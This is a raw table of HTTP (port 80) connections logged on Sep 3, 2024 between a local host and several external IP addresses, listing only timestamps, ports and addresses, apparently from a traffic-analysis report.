Sep 3, 2024 13:54:05.265693903 CEST  49743        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:05.265754938 CEST  49743        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:05.265923023 CEST  80           49743      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:05.270782948 CEST  80           49743      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:05.270796061 CEST  80           49743      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:05.270807981 CEST  80           49743      37.187.158.211  192.168.2.4
                                        Sep 3, 2024 13:54:05.270821095 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.270857096 CEST4974380192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:05.270875931 CEST4974380192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:05.271100998 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.271148920 CEST4974380192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:05.271163940 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.271183014 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.271194935 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.271225929 CEST4974380192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:05.271903038 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.271949053 CEST4974380192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:05.271982908 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.271995068 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.272006035 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.272042990 CEST4974380192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:05.275738955 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.275762081 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.275772095 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.275784016 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.275815010 CEST4974380192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:05.275846958 CEST4974380192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:05.276160002 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.276170969 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.276181936 CEST804974337.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:05.276213884 CEST4974380192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:05.276235104 CEST4974380192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:05.699516058 CEST4974380192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:06.718252897 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:06.723104954 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:06.723211050 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:06.732491970 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:06.738687038 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:06.738698959 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:06.738702059 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:06.738832951 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:06.738842010 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:06.738989115 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:06.738997936 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:06.739149094 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:06.739157915 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.708841085 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.708879948 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.708893061 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.708921909 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:07.708964109 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.708975077 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.708986998 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.708998919 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.709011078 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.709017038 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:07.709041119 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:07.709062099 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:07.709079981 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.709139109 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.709182978 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:07.714015961 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.714035988 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.714050055 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.714178085 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:07.760457039 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:07.790929079 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.790937901 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.790949106 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.790965080 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.790976048 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.790987968 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.790999889 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.791132927 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:07.791132927 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:07.791790009 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.791807890 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.791820049 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.791841030 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:07.791867971 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.791877985 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:07.791881084 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.791938066 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:07.792622089 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.792642117 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.792654037 CEST804974437.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:07.792676926 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:07.792700052 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:08.245090961 CEST4974480192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:09.264777899 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:09.275059938 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:09.275150061 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:09.284306049 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:09.289406061 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.176074028 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.176091909 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.176103115 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.176197052 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.176208019 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.176213980 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.176219940 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.176295042 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:10.176335096 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.176340103 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:10.176347971 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.176361084 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.176397085 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:10.176415920 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:10.181113958 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.181152105 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.181164026 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.181174994 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.181210041 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:10.181245089 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:10.247176886 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.257384062 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.257512093 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:10.257553101 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.257565022 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.257576942 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.257589102 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.257606030 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:10.257689953 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:10.257776022 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.257787943 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.257801056 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.257812977 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.257855892 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:10.258436918 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.258455038 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.258467913 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.258480072 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.258491993 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.258524895 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:10.259174109 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:10.259232998 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:10.263015985 CEST4974580192.168.2.437.187.158.211
                                        Sep 3, 2024 13:54:10.267765045 CEST804974537.187.158.211192.168.2.4
                                        Sep 3, 2024 13:54:15.291107893 CEST4974680192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:15.296025038 CEST8049746167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:15.296130896 CEST4974680192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:15.304673910 CEST4974680192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:15.309478998 CEST8049746167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:15.743071079 CEST8049746167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:15.743185043 CEST8049746167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:15.743252993 CEST4974680192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:16.807418108 CEST4974680192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:17.830459118 CEST4974780192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:17.835364103 CEST8049747167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:17.835455894 CEST4974780192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:17.846111059 CEST4974780192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:17.850923061 CEST8049747167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:18.275681019 CEST8049747167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:18.276112080 CEST8049747167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:18.276274920 CEST4974780192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:19.354307890 CEST4974780192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:20.376503944 CEST4974880192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:20.381352901 CEST8049748167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:20.381438017 CEST4974880192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:20.390868902 CEST4974880192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:20.395745993 CEST8049748167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:20.395756006 CEST8049748167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:20.395832062 CEST8049748167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:20.395842075 CEST8049748167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:20.395883083 CEST8049748167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:20.395920992 CEST8049748167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:20.395962000 CEST8049748167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:20.396033049 CEST8049748167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:20.396045923 CEST8049748167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:20.837920904 CEST8049748167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:20.847398996 CEST8049748167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:20.847513914 CEST4974880192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:21.901177883 CEST4974880192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:22.920038939 CEST4974980192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:22.924954891 CEST8049749167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:22.925043106 CEST4974980192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:22.932180882 CEST4974980192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:22.936969995 CEST8049749167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:23.349275112 CEST8049749167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:23.349293947 CEST8049749167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:23.349499941 CEST4974980192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:23.351557970 CEST4974980192.168.2.4167.172.133.32
                                        Sep 3, 2024 13:54:23.356343985 CEST8049749167.172.133.32192.168.2.4
                                        Sep 3, 2024 13:54:28.548842907 CEST4975080192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:28.553632975 CEST8049750206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:28.553710938 CEST4975080192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:28.565115929 CEST4975080192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:28.569907904 CEST8049750206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:29.417357922 CEST8049750206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:29.417371035 CEST8049750206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:29.417442083 CEST4975080192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:30.073213100 CEST4975080192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:31.094923019 CEST4975180192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:31.099792004 CEST8049751206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:31.103040934 CEST4975180192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:31.120153904 CEST4975180192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:31.124953985 CEST8049751206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:31.966136932 CEST8049751206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:31.966188908 CEST8049751206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:31.966236115 CEST4975180192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:32.638917923 CEST4975180192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:33.655323982 CEST4975280192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:33.836055994 CEST8049752206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:33.836138010 CEST4975280192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:33.857142925 CEST4975280192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:33.862081051 CEST8049752206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:33.862092972 CEST8049752206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:33.862104893 CEST8049752206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:33.862131119 CEST8049752206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:33.862186909 CEST8049752206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:33.862195969 CEST8049752206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:33.862234116 CEST8049752206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:33.862241983 CEST8049752206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:33.862251997 CEST8049752206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:34.722579956 CEST8049752206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:34.723431110 CEST8049752206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:34.729254007 CEST4975280192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:35.369905949 CEST4975280192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:36.388232946 CEST4975380192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:36.393091917 CEST8049753206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:36.393177032 CEST4975380192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:36.399796009 CEST4975380192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:36.404575109 CEST8049753206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:37.271822929 CEST8049753206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:37.271863937 CEST8049753206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:37.272000074 CEST4975380192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:37.274858952 CEST4975380192.168.2.4206.119.82.116
                                        Sep 3, 2024 13:54:37.279588938 CEST8049753206.119.82.116192.168.2.4
                                        Sep 3, 2024 13:54:42.390665054 CEST4975480192.168.2.466.29.149.180
                                        Sep 3, 2024 13:54:42.395453930 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:42.395518064 CEST4975480192.168.2.466.29.149.180
                                        Sep 3, 2024 13:54:42.408958912 CEST4975480192.168.2.466.29.149.180
                                        Sep 3, 2024 13:54:42.413825035 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:43.011328936 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:43.011353016 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:43.011368036 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:43.011435986 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:43.011449099 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:43.011449099 CEST4975480192.168.2.466.29.149.180
                                        Sep 3, 2024 13:54:43.011461973 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:43.011493921 CEST4975480192.168.2.466.29.149.180
                                        Sep 3, 2024 13:54:43.011506081 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:43.011518955 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:43.011522055 CEST4975480192.168.2.466.29.149.180
                                        Sep 3, 2024 13:54:43.011532068 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:43.011574984 CEST4975480192.168.2.466.29.149.180
                                        Sep 3, 2024 13:54:43.011686087 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:43.011737108 CEST4975480192.168.2.466.29.149.180
                                        Sep 3, 2024 13:54:43.016442060 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:43.016453028 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:43.016464949 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:43.016485929 CEST804975466.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:43.016546011 CEST4975480192.168.2.466.29.149.180
                                        Sep 3, 2024 13:54:43.016546011 CEST4975480192.168.2.466.29.149.180
                                        Sep 3, 2024 13:54:43.916933060 CEST4975480192.168.2.466.29.149.180
                                        Sep 3, 2024 13:54:44.938950062 CEST4975580192.168.2.466.29.149.180
                                        Sep 3, 2024 13:54:44.945858002 CEST804975566.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:44.951064110 CEST4975580192.168.2.466.29.149.180
                                        Sep 3, 2024 13:54:44.961085081 CEST4975580192.168.2.466.29.149.180
                                        Sep 3, 2024 13:54:44.966109037 CEST804975566.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:45.545619011 CEST804975566.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:45.545634985 CEST804975566.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:45.545646906 CEST804975566.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:45.545666933 CEST804975566.29.149.180192.168.2.4
                                        Sep 3, 2024 13:54:45.545677900 CEST804975566.29.149.180192.168.2.4
                                        Sep 3, 2024 13:55:48.917598963 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:48.917610884 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:48.917622089 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:48.917630911 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:48.917634964 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:48.917654037 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:48.917663097 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:48.917665958 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:48.917680025 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:48.917682886 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:48.917705059 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:48.917741060 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:48.922507048 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:48.922527075 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:48.922537088 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:48.922610998 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.004832983 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.004857063 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.004873037 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.004887104 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.004944086 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.004944086 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.009587049 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.009601116 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.009685993 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.009699106 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.009771109 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.009771109 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.014333963 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.014345884 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.014355898 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.014420033 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.014432907 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.014606953 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.019309998 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.019323111 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.019337893 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.019349098 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.019361019 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.019371033 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.019372940 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.019393921 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.024038076 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.024049997 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.024089098 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.024100065 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.024205923 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.028718948 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.028731108 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.028740883 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.028906107 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.092508078 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.092551947 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.092562914 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.092606068 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.095099926 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.097275972 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.097289085 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.099865913 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.099878073 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.099895954 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.102001905 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.102015018 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.102031946 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.104573011 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.104592085 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.104603052 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.104631901 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.104631901 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.106719971 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.106740952 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.107094049 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.109388113 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.109400034 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.111479998 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.111493111 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.111504078 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.111507893 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.113121033 CEST4977180192.168.2.4162.55.254.209
